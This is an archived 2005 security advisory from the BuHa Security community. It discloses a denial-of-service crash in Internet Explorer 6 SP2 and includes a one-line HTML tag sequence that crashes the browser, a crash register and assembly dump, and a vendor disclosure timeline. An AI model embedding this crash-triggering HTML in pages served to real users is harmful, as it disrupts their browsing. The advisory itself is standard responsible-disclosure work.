<<< Date Index >>>     <<< Thread Index >>>

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ---------------------------------------------------
| BuHa Security-Advisory #6     |    Dec 24th, 2005 |
 ---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Low (DoS - Null Pointer Dereference)   |
 ---------------------------------------------------
 
o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d6d8eba
===================

Following HTML code forces M$ IE 6 to crash:
> <acronym><dd><h5><applet></caption></applet><li></h1>

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900617750-7d6d8eba.html

These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01295390 ecx=00000000 edx=00000000 esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=00000000
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00000246

        7d6d8e84 894c2414         mov     [esp+0x14],ecx
        7d6d8e88 8b8ea4000000     mov     ecx,[esi+0xa4]
        7d6d8e8e 24fe             and     al,0xfe
        7d6d8e90 57               push    edi
        7d6d8e91 89542410         mov     [esp+0x10],edx
        7d6d8e95 8954241c         mov     [esp+0x1c],edx
        7d6d8e99 88442420         mov     [esp+0x20],al
        7d6d8e9d e89912e5ff       call    mshtml+0x7a13b (7d52a13b)
        7d6d8ea2 8b4c2428         mov     ecx,[esp+0x28]
        7d6d8ea6 68b2a06e7d       push    0x7d6ea0b2
        7d6d8eab 8bf8             mov     edi,eax
        7d6d8ead e89bb7e5ff       call    mshtml+0x8464d (7d53464d)
        7d6d8eb2 50               push    eax
        7d6d8eb3 8bcf             mov     ecx,edi
        7d6d8eb5 e8dfebfdff       call    mshtml+0x207a99 (7d6b7a99)
FAULT ->7d6d8eba 668b500c         mov     dx,[eax+0xc]
                                          ds:0023:0000000c=????
        7d6d8ebe 6685d2           test    dx,dx
        7d6d8ec1 7c39             jl      mshtml+0x228efc (7d6d8efc)
        7d6d8ec3 833d50e3747d01   cmp     dword ptr [mshtml+0x29e350
                                          (7d74e350)],0x1
        7d6d8eca 0fbffa           movsx   edi,dx
        7d6d8ecd 7513             jnz     mshtml+0x228ee2 (7d6d8ee2)
        7d6d8ecf a14ce3747d       mov     eax,[mshtml+0x29e34c
                                          (7d74e34c)]
        7d6d8ed4 8b484c           mov     ecx,[eax+0x4c]
        7d6d8ed7 8b4134           mov     eax,[ecx+0x34]
        7d6d8eda 8d147f           lea     edx,[edi+edi*2]
        7d6d8edd 8b3c90           mov     edi,[eax+edx*4]
        7d6d8ee0 eb23             jmp     mshtml+0x228f05 (7d6d8f05)

The access violation results in a null pointer dereference and is not 
exploitable. 


o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:
> M$ IE 6 SP2 - Win XP Pro SP2
> M$ IE 6     - Win 2k SP4


o Disclosure Timeline:
=====================

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==========

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=========

Christian Deneke <bugtraq@xxxxxxxxxx>

- --

Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-3.txt 

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdu6kCo6/ctnOpYRAs1cAKCOabmBR3EtFBoMz/wKinVVpU/q/ACeK2kG
A4pamspAa8+NY9TDiCz738s=
=Wga9
-----END PGP SIGNATURE-----